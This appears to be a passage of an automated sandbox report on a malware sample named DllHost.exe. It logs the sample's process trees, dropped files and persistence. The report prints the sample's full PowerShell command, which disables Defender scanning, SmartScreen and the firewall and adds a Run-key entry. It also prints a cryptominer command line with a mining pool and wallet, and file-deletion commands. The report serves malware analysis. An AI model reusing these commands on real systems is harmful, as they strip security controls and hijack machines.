Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\ProgramData\Systemd\procexp.exe --url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass xJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state offJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F Jump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exitJump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6616 -ip 6616
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 528 -p 4352 -ip 4352
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6616 -s 2172
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4352 -s 2560
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Users\user\Desktop\DllHost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400407D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,44_2_00000001400407D0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140076800 OpenProcess,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,44_2_0000000140076800
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "procexp.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "procexp.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "procexp.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "procexp.exe")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnlq0wbb.ax0.ps1Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191B6EB0 SHGetSpecialFolderPathW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,lstrcatW,CreateFileW,WriteFile,CloseHandle,CoInitializeEx,CoCreateInstance,lstrlenW,lstrlenW,DeleteFileW,0_2_00007FF7191B6EB0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006ECC0 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,44_2_000000014006ECC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191B5470 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,OpenProcess,CloseHandle,0_2_00007FF7191B5470
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6508:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_01
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6616
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_01
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6912:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_01
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4352
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_01
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6848:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadlineHistoryFile_169209511
Source: C:\Users\user\Desktop\DllHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\ProgramData\Systemd\procexp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\ProgramData\Systemd\procexp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: DllHost.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: DllHost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DllHost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DllHost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DllHost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DllHost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DllHost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: DllHost.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: DllHost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DllHost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DllHost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DllHost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DllHost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DllHost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191DC424 push rbp; retn 0002h0_2_00007FF7191DC425
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191DC46A push rdx; ret 0_2_00007FF7191DC46D
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C6C424 push rbp; retn 0002h11_2_00007FF6E4C6C425
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C6C46A push rdx; ret 11_2_00007FF6E4C6C46D
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140013BE0 LoadLibraryA,GetProcAddress,44_2_0000000140013BE0
Source: DllHost.exeStatic PE information: section name: _RDATA
Source: procexp.exe.0.drStatic PE information: section name: .xdata
Source: System.exe.0.drStatic PE information: section name: _RDATA
Source: procexp.exe.0.drStatic PE information: real checksum: 0x7ea72a should be: 0x7f1105
Source: DllHost.exeStatic PE information: real checksum: 0x0 should be: 0x72c45
Source: System.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x72c45

Persistence and Installation Behavior

barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Users\user\Desktop\DllHost.exeFile created: C:\ProgramData\Systemd\procexp.exeJump to dropped file
Source: C:\Users\user\Desktop\DllHost.exeFile created: C:\ProgramData\MicrosoftNetwork\System.exeJump to dropped file
Source: C:\ProgramData\MicrosoftNetwork\System.exeFile created: C:\ProgramData\Systemd\old.exe (copy)Jump to dropped file
Source: C:\Users\user\Desktop\DllHost.exeFile created: C:\ProgramData\UpSys.exeJump to dropped file
Source: C:\Users\user\Desktop\DllHost.exeFile created: C:\ProgramData\Systemd\procexp.exeJump to dropped file
Source: C:\Users\user\Desktop\DllHost.exeFile created: C:\ProgramData\MicrosoftNetwork\System.exeJump to dropped file
Source: C:\ProgramData\MicrosoftNetwork\System.exeFile created: C:\ProgramData\Systemd\old.exe (copy)Jump to dropped file
Source: C:\Users\user\Desktop\DllHost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\UpSys[1].exeJump to dropped file
Source: C:\Users\user\Desktop\DllHost.exeFile created: C:\ProgramData\UpSys.exeJump to dropped file
Source: C:\Users\user\Desktop\DllHost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\20220707
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\20220707\PowerShell_transcript.618321.QT2r3ikd.20220707095226.txt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mpssvcJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnkJump to behavior
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140041BD0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,44_2_0000000140041BD0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014008BCB0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,44_2_000000014008BCB0
Source: C:\Users\user\Desktop\DllHost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
